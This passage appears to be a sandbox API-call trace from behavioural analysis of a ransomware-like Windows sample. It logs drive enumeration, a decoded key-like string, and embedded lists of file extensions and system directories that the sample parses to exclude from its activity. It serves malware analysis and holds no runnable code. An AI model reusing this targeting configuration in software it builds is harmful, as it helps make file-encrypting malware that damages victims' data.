[2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x7276e1 [0117.127] GetSidSubAuthority (pSid=0x7276e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x7276e8 [0117.127] LocalFree (hMem=0x7276d8) returned 0x0 [0117.127] CloseHandle (hObject=0xb8) returned 1 [0117.127] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0117.127] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0117.128] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0117.128] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0117.128] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0117.128] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0117.128] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0117.128] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0117.128] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0117.128] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0117.128] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0117.128] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0117.129] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0117.129] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0117.129] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0117.129] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0117.129] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0117.129] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0117.129] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0117.129] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0117.129] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0117.129] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0117.129] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0117.130] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0117.130] FindResourceW (hModule=0x400000, lpName="NDNF", lpType=0xa) returned 0x51c420 [0117.130] LoadResource (hModule=0x400000, hResInfo=0x51c420) returned 0x516824 [0117.130] SizeofResource (hModule=0x400000, hResInfo=0x51c420) returned 0x267 [0117.130] LockResource (hResData=0x516824) returned 0x516824 [0117.130] FreeResource (hResData=0x516824) returned 0 [0117.130] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0117.130] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0117.130] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0117.130] LockResource (hResData=0x50d64c) returned 0x50d64c [0117.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x635008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0117.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x635008, cbMultiByte=38, lpWideCharStr=0x62deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0117.130] FreeResource (hResData=0x50d64c) returned 0 [0117.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0117.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x63500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0117.130] GetCurrentThreadId () returned 0xe60 [0117.130] GetCurrentThreadId () returned 0xe60 [0117.130] GetCurrentThreadId () returned 0xe60 [0117.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x5c0128, cbMultiByte=615, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 615 [0117.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x5c0128, cbMultiByte=615, lpWideCharStr=0x5cc65c, cchWideChar=615 | out: lpWideCharStr="[NF_START]\r\nAST\r\nAFN\r\nELST\r\nEXE\r\nLNK\r\nHTA\r\nPEK\r\nSEK\r\nB10CKED\r\nTMP\r\nICO\r\n000\r\nSYS\r\nDAT\r\nRTF\r\nINF\r\nDLL\r\nDAT\r\nREG\r\nDRV\r\nDEV\r\nPIF\r\nMBR\r\nINI\r\nXML\r\nLIST\r\nTTF\r\nLOG\r\nJA\r\nCOM\r\nBAT\r\nCMD\r\nVBS\r\nJS\r\nCFG\r\nDOWNLOAD\r\nNFO\r\nMSI\r\nCHK\r\nDMP\r\nMUI\r\nDUN\r\nISP\r\nISW\r\nCAB\r\nEFI\r\nHLP\r\nMSU\r\nHLP\r\nBIN\r\nLNG\r\nTORRENT_INFO\r\nTORRENT\r\nHTM\r\nHTML\r\nCHM\r\nLANG\r\nSTYLE\r\nMP3\r\nFLAC\r\nOGG\r\nWMA\r\nGIF\r\nJAVA\r\nCUR\r\nANI\r\n[NF_END]\r\n[ND_START]\r\n\\WINDOWS\r\n\\PROGRAM FILES\r\n\\GAMES\r\n\\APPDATA\\\r\n\\APPLICATION DATA\\\r\n\\LOCAL SETTINGS\\\r\n\\TEMP\\\r\n\\PROGRAMDATA\\\r\n\\BOOT\\\r\n\\MSOCACHE\\\r\n\\DEFAULT USER\\\r\n\\SAMPLE\r\n\\EXAMPLE\r\n\\I386\r\n\\TEMPORARY\r\n\\TOR BROWSER\\\r\n\\BROWSER\r\nBROWSER\\\r\n[ND_END]") returned 615 [0117.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_START]", cchCount2=10) returned 2 [0117.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 2 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 2 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 